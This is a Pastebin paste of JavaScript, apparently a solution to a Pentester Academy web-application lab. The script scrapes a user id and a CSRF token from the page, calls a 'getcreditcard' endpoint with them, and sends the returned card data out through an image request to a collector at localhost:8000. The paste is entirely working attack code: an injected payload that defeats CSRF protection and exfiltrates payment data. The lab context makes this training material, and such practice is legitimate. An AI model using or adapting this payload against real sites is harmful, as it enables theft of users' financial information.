Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var x = document.querySelector('a');
- var uid = x.innerText.split(':')[1];
- var reqHandel = new XMLHttpRequest();
- reqHandel.onreadystatechange = function(){
- if (this.readyState == 4 && this.status == 200){
- var el = document.createElement( 'html' );
- el.innerHTML = reqHandel.responseText;
- var token = el.querySelectorAll('form input')[1].value;
- (function(){
- var handel = new XMLHttpRequest();
- handel.onreadystatechange = function(){
- if (this.readyState == 4 && this.status == 200){
- var cc = document.createElement( 'html' );
- cc.innerHTML = handel.responseText;
- document.querySelector('#result').innerText = cc.querySelector('#result').innerText;
- new Image().src = "http://localhost:8000/?user=" + document.querySelector('#result').innerText;
- }
- }
- var urlTo = 'http://pentesteracademylab.appspot.com/lab/webapp/jfp/19/getcreditcard?uid='+uid+'&csrf_token='+token;
- handel.open('GET',urlTo, true);
- handel.send();
- })();
- }
- }
- reqHandel.open('GET',x.href,true);
- reqHandel.send();
Add Comment
Please, Sign In to add comment
